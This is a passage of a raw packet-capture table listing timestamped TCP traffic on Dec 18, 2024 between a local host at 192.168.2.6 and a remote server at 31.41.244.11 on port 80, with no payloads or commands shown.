                                                                                                                                                              Dec 18, 2024 11:47:45.233233929 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.233326912 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.233361959 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.234384060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.234437943 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.234448910 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.234479904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.235526085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.235627890 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.235650063 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.235687017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.236769915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.236810923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.236849070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.236885071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.237963915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.238025904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.238171101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.238209963 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.239187956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.239228010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.239263058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.239301920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.240326881 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.240372896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.240653992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.240695000 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.241516113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.241563082 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.241581917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.241617918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.242706060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.242752075 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.242780924 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.242819071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.243824959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.243880033 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.243947029 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.243988037 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.245059967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.245102882 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.245197058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.245235920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.246192932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.246238947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.246360064 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.246398926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.247359991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.247406006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.247560024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.247596979 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.248570919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.248617887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.248667955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.248703003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.249741077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.249784946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.249839067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.249874115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.251176119 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.251199007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.251218081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.251235962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.252160072 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.252199888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.252289057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.252330065 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.253309965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.253350019 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.253417015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.253453970 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.254465103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.254509926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.254553080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.254590034 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.255655050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.255700111 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.255759001 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.255794048 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.256870031 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.256916046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.256980896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.257021904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.258230925 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.258276939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.258445978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.258487940 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.259295940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.259340048 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.259350061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.259393930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.260380983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.260426998 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.260494947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.260535002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.261559010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.261605978 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.261710882 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.261751890 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.262777090 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.262820959 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.262866020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.262906075 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.263968945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.264015913 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.264050007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.264089108 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.265130997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.265176058 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.265259981 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.265295029 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.266314983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.266360044 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.266470909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.266505003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.267525911 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.267580986 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.267630100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.267668962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.268670082 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.268727064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.268851995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.268891096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.269913912 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.269973040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.270071983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.270118952 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.271087885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.271142006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.271183014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.271218061 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.272242069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.272284031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.272352934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.272391081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.273432016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.273478985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.273545980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.273581982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.274635077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.274652004 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.274682999 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.274698973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.275856018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.275888920 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.275907993 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.275923014 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.276977062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.276993990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.277021885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.277036905 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.278119087 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.278162003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.278264999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.278302908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.279292107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.279335976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.279385090 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.279419899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.280509949 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.280560017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.280600071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.280633926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.281711102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.281754017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.281801939 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.281836033 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.282944918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.283005953 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.283010960 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.283044100 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.284099102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.284152031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.284317017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.284353971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.285248041 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.285290956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.285351992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.285388947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.286407948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.286453009 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.286535025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.286569118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.287571907 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.287615061 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.287657022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.287695885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.417484999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.417572021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.417588949 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.417632103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.417870045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.417917967 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.417953014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.417993069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.418765068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.418809891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.418900013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.418940067 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.420104980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.420137882 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.420152903 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.420178890 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.420727968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.420773029 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.420835018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.420876026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.421865940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.421909094 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.421988964 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.422033072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.422918081 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.422966003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.423010111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.423051119 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.424139977 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.424181938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.424243927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.424279928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.425295115 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.425333977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.425401926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.425436974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.426445961 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.426486015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.426562071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.426598072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.427597046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.427635908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.427714109 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.427745104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.428778887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.428816080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.428878069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.428910017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.429981947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.430021048 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.430094957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.430130005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.431147099 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.431165934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.431185961 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.431200027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.432348967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.432410002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.432507038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.432564974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.433476925 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.433517933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.433594942 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.433629990 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.434724092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.434762001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.434799910 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.434838057 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.435838938 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.435892105 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.435929060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.435969114 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.437002897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.437040091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.437119007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.437156916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.438188076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.438231945 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.438292980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.438330889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.439420938 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.439459085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.439730883 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.439769030 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.440557003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.440594912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.440663099 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.440700054 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.441720963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.441761017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.441832066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.441869020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.442871094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.442913055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.442970991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.443007946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.444068909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.444108009 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.444185019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.444221973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.445238113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.445282936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.445390940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.445429087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.446459055 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.446504116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.446619987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.446657896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.447577000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.447613955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.447777033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.447812080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.448786974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.448823929 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.448872089 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.448909044 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.449918985 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.449956894 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.450021982 CET804987831.41.244.11192.168.2.6
